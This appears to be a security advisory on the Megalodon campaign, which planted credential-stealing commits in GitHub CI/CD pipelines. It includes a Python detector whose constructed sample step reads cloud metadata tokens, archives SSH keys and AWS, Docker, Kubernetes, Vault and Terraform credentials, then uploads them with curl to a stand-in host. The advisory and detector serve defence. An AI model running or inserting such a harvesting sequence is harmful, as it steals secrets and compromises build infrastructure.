Technical Details
On May 18, the Megalodon malware campaign hit repositories hosted on GitHub, injecting malicious commits into over 5,500 of them.
Malware Description
The malware's primary function is to steal CI/CD credentials. Once a malicious commit is accepted into a project, the code it carries runs on the project's CI/CD servers, harvests the credentials available there, and uses them to spread further.
Megalodon Capabilities
Beyond CI/CD credentials, the malware collects other sensitive data: AWS secret keys and Google Cloud tokens; instance metadata requested from the AWS, Google Cloud Platform and Azure metadata services; private SSH keys; Docker and Kubernetes configurations; Vault tokens; and Terraform credentials. It also scans source code for further secrets using more than 30 regular expressions.
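The behaviour listed above maps onto concrete artefacts on a build runner: credential files in well-known locations, the cloud instance-metadata endpoints, and an outbound upload of what was gathered. The Python script below is an added example written for this page; it is not Megalodon's code and not anything from the Tiledesk project. It scans the shell commands of a CI step for those indicators and scores a step that combines credential reads with an upload. The file paths, metadata endpoints, the hypothetical upload host and the two constructed sample steps are assumptions based on standard tool locations, not details taken from the report.

```python
"""Flag CI steps that read credential material and ship it off the runner.

Added illustration for this page: the indicator list is an assumption built
from standard credential locations and metadata endpoints, not from any
published analysis of Megalodon.
"""
import re
from typing import Dict, List, Tuple

# (indicator name, pattern). Paths/endpoints are the conventional ones for each
# tool (assumed); "exfil_to_remote" needs a whitespace-delimited upload flag so
# that header values such as "Metadata-Flavor" do not trigger it.
INDICATORS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("aws_credentials_file", re.compile(r"\.aws/credentials")),
    ("cloud_metadata_ip", re.compile(r"169\.254\.169\.254")),  # AWS and Azure IMDS
    ("azure_imds", re.compile(r"metadata/instance\?api-version")),
    ("gcp_metadata", re.compile(r"metadata\.google\.internal")),
    ("gcloud_token", re.compile(r"application_default_credentials\.json|\.config/gcloud")),
    ("ssh_private_key", re.compile(
        r"\.ssh/id_[a-z0-9]+(?!\.pub)\b|-----BEGIN (?:RSA|OPENSSH|EC) PRIVATE KEY-----")),
    ("docker_config", re.compile(r"\.docker/config\.json")),
    ("kube_config", re.compile(r"\.kube/config|\bKUBECONFIG\b")),
    ("vault_token", re.compile(r"\.vault-token|\bVAULT_TOKEN\b")),
    ("terraform_credentials", re.compile(r"\.terraformrc|terraform\.rc|\bTF_TOKEN_")),
    ("exfil_to_remote", re.compile(
        r"\bcurl\b[^\n]*\s(?:-d|--data(?:-binary|-raw)?|-F|-T|--upload-file)\s"
        r"|\bwget\b[^\n]*\s--post-(?:data|file)[=\s]")),
]


def scan_step(script: str) -> Dict[str, List[int]]:
    """Return {indicator: [1-based line numbers]} for every indicator seen."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(script.splitlines(), 1):
        for name, rx in INDICATORS:
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def risk_score(hits: Dict[str, List[int]]) -> int:
    """One point per credential source touched; +3 when an upload channel is
    present alongside at least one credential source (the harvesting pattern)."""
    cred_sources = [name for name in hits if name != "exfil_to_remote"]
    bonus = 3 if ("exfil_to_remote" in hits and cred_sources) else 0
    return len(cred_sources) + bonus


# Constructed sample steps (not real pipeline content).
BENIGN_STEP = """\
npm ci
npm test
docker build -t app:ci .
"""

# Constructed to mimic the reported behaviour: metadata lookups, credential
# file collection, then an upload to a hypothetical host (example.invalid).
SUSPICIOUS_STEP = """\
TOKEN=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token)
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
tar czf /tmp/.c.tgz ~/.aws/credentials ~/.ssh/id_rsa ~/.docker/config.json ~/.kube/config ~/.vault-token ~/.terraformrc
curl -s -F "f=@/tmp/.c.tgz" https://example.invalid/upload
"""

if __name__ == "__main__":
    for label, step in (("benign", BENIGN_STEP), ("suspicious", SUSPICIOUS_STEP)):
        found = scan_step(step)
        print(f"{label}: score={risk_score(found)} indicators={sorted(found)}")
```

Run it over the `run:` bodies of workflow files or over the diff of an incoming commit; a step that both touches several credential sources and opens an upload channel is the pattern the report describes and deserves a manual look before the pipeline executes it. The score is deliberately crude: it is a triage signal, not a verdict.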
Detection
Megalodon was discovered in Tiledesk, an open-source platform for online chat and chatbots. Compromising the project's npm account was not required: injecting the malicious commit into the project's GitHub repository was enough for the code to run in its CI/CD pipeline.
Consequences
Repeated compromises of this kind put every company that keeps private repositories on GitHub at risk. The malware continues to reach build servers, and so far it has not been stopped.
